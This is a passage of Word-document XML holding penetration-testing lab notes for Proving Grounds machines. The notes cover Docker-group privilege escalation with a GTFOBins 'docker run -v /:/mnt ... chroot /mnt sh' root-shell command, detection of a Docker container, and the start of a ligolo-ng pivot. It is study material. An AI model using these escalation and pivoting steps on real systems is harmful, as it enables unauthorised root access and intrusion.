        <w:t xml:space="preserve">As you can see here, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">alpine </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is not existent here so we can't just copy and paste the command from GTFOBins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="695"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We have to replace </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">alpine </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with one of the docker images we have (ex. redmine)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E63">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E64">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use the GTFObins command replacing the value &lt;alpine&gt; with one of the images listed above.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E65">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">docker run -v /:/mnt --rm -it redmine chroot /mnt sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E66">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E67">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we have root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E68">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E69">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E6A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E6B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E6C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId635">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Pwned1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we saw that we were in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker group</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E6D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="584200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="469" name="image446.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image446.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId636"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="594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1E6E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And since we are in the Docker group, that always means we can run the Docker binary. And usually, the only way to run the Docker binary is through the Docker Daemon, which runs as a root user. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E6F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E70">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we are looking at binaries, we go to GTFO Bins, and specifically in the "Shell" section since we are trying to get a shell from Docker. We don't look at the SUID or SUDO section since we don't have either of those. And in the "Shell" section, it says that we can get a root shell from the command.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E71">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="815"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">docker run -v /:/mnt --rm -it alpine chroot /mnt sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E72">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="815"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">However this assumes alpine is a docker image you already have. Here, it worked, but in another writeup, we had to replace alpine with another docker image</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E73">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E74">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can do a similar thing if you see a user part of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lxd </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">group. Some groups that are tied to services/binaries can be exploited since being in that group allows for running of binaries as root (in-directly through the daemon)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E75">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E76">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E77">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_htcko022jmwe" w:id="258"/>
      <w:bookmarkEnd w:id="258"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to tell if you are currently inside of a Docker container instead of an actual machine and how to escape using ligolo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E78">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E79">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId637">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SkillForce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG practice, we used a script to get RCE, but then we realized we weren't inside the actual machine but rather a Docker Container, and we need to escape.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E7A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E7B">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upon further analysis, we discover that the environment we have gained access to is actually a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker container</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, rather than the actual host system. This becomes evident when inspecting the root directory, where we observe files such as</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.dockerenv</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">entrypoint.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which are strong indicators of a containerized environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E7C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With this in mind, our next objective is to identify a method to escape the container and gain access to the underlying host machine. One technique we can use to pivot from the container to the host or other internal systems is by leveraging tunneling tools such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ligolo-ng</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This tool allows us to establish a connection that effectively bridges the container’s internal network with our attacking machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E7D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By setting up a ligolo-ng agent within the container and connecting it back to our listener, we gain the ability to route traffic through the container. This enables us to perform </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">internal network reconnaissance</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, such as scanning for other potentially vulnerable hosts or services that are not exposed externally.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E7E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E7F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before proceeding with Ligolo-ng, we need to identify the network interface within the container that we want to route our traffic through. This can be done by running ifconfig inside the container:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E80">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp $ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E81">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">eth0      Link encap:Ethernet  HWaddr DE:AE:70:DC:FF:B4  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E82">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  inet addr:172.18.0.2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  Bcast:172.18.255.255  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mask:255.255.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E83">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E84">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">          RX packets:1272 errors:0 dropped:0 overruns:0 frame:0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E85">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">          TX packets:1174 errors:0 dropped:0 overruns:0 carrier:0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E86">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">          collisions:0 txqueuelen:0 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E87">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">          RX bytes:4636092 (4.4 MiB)  TX bytes:689520 (673.3 KiB)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E88">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E89">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the output above, we observe that the container is using the eth0 interface with an IP address of</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 172.18.0.2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This confirms that the container is on the 172.18.0.0/16 Docker bridge network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E8A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
